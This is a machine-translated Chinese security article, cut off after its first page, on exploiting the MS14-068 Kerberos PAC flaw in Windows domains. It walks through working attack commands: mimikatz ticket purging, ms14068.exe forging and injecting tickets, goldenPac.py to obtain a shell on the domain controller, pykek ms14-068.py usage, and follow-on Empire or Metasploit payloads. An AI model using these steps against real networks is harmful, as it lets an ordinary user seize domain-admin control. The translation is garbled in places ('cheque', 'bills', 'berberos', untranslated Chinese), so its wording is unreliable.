MS14-068-domain privilege escalation vulnerability summary-vulnerability warning-the black bar safety net

2017-02-14T00:00:00
ID MYHACK58:62201783391
Type myhack58
Reporter 佚名
Modified 2017-02-14T00:00:00

Description

0x01 vulnerability of origin Said to ms14-068,have to say the silver ticket, that is, the cheque in. Cheque is a piece of tgs, that is, a service Ticket. The service ticket is the client is sent directly to the server and request the service resource. If the server is not the domain controller dc to verify the pac, then the client can be spoofed domain Management Permissions to access the server. So ms14-068 source and the cheque is closely related. In the mimikatz author of the ppt inside is thus described: ! So this really is a large loophole that allows domain within any ordinary user, will own up to the domain management permission. Microsoft gives the patch kb3011780 it. In server 2000 or above domain controller, as long as no hit this patch, then the situation will be very bad. https://technet.microsoft.com/library/security/ms14-068.aspx 0x02 exploit 2.1 windows environment under test In the windows environment, mimikatz author has already written an exploit for. https://github.com/gentilkiwi/kekeo One of the ms14-068. exe it is precisely this vulnerability using the tool. To test this vulnerability, the premise still have to understand that kerberos throughout the authentication Protocol process, or is not going to understand the principles, test process what went wrong don't know how to solve it. We as penetration testers, if the windows environment is so important an authentication Protocol do not understand, I want to network penetration also is the clouds. Take advantage of this vulnerability, we need a normal domain user account name and the password or hash, pass-the-hash I have in other articles summarized, in fact, the hash and the password is the same effect. As well as the domain name, the user's sids. These are not the focus, the focus is on how to get a domain user account, we are within the domain of a machine of the above grab the hash or plaintext password, or other method, and so on. 2.1.2 under windows using the process Test environment: Domain: xxx.com Dc: dc.xxx.com Win7: the win7-01.xxx.com First of all, we in dc above to detect whether this vulnerability: ! Unfortunately, there is no beating this patch. Here we are in win7 the above test the vulnerability. Win7 is a normal domain within the machine, an ordinary domain user jack log in. Test access to the domain controller c drive sharing: ! Access is denied. In order for us to generate the bills play a role, first of all we need the memory in the existing kerberos ticket cleared, the clearing method is the use of mimikatz:

kerberos::purge

! Use the ms14-068 to produce a high-privilege berberos service ticket, and injected into the memory: ms14068.exe /domain:xxx.com /user:jack /password:jackpwd/ /ptt ! Then test the access: ! Testing psexec no password ! Great, to achieve what we want effect. If you want to generate a kerberos ticket, to do the bills passing attack(ptt), you can this: ms14068.exe /domain:xxxcom /sid:S-1-5-21-2666969376-4225180350-4077551764 /user:jack /rid:1104 /password:jackpwd/ /aes256 /kdc:dc.xxx.com /ticket:jack_admin. kirbi Then with mimikatz ptt functionality, the bills introduced into the memory. 2.2 kali environment under test If it is remotely within the network environment, the first thing to do within the Network Agent, this would not have much to say. Then their dns pointing to the domain controller. Linux the following test tools there are many, of course, the msf this vulnerability using the framework is definitely needed in this module. About msf the use of process I there is no longer much speak, giving the country an article using the process: https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit 2.2.1 goldenPac.py Kali 下面 利用 此 漏洞 的 工具 我 是 强烈 推荐 impacket 工具 包 里面 的 goldenPac.py this tool is a combination of ms14-068 add psexec to the product, using up very smoothly. Kali the following default have not installed the kerberos authentication function, so we first have to install a kerberos client: apt-get install krb5-user The most simple way: goldenPac.py xxx.com/jack:jackpwd@dc.xxx.com 就 可以 得到 一 个 cmd shell: ! Of course this tool is more than just getting a shell, we can even directly get the domain controller is running, we Upload a program, the execution of a empire stager or a msf payload are alone. 2.2.1 ms14-068.py https://github.com/bidord/pykek Effects and mimikatz written by the author the virus almost, this script is generating a kerberos ticket cache, this cache is mainly for linux above of kerberos authentication, but mimikatz has also passed bills of the cache function(ptc), in fact, and mimikatz generated kirbi format notes just in a different format. Of course not, the kerberos client does not work, if it is not installed remember to install: apt-get install krb5-user This use of the process requires the sid and the user name and password(the hash can also be)。 Use method: ms14-068.py -u jack@xxx.com -s jacksid-d dc.xxx.com

[1] [2] next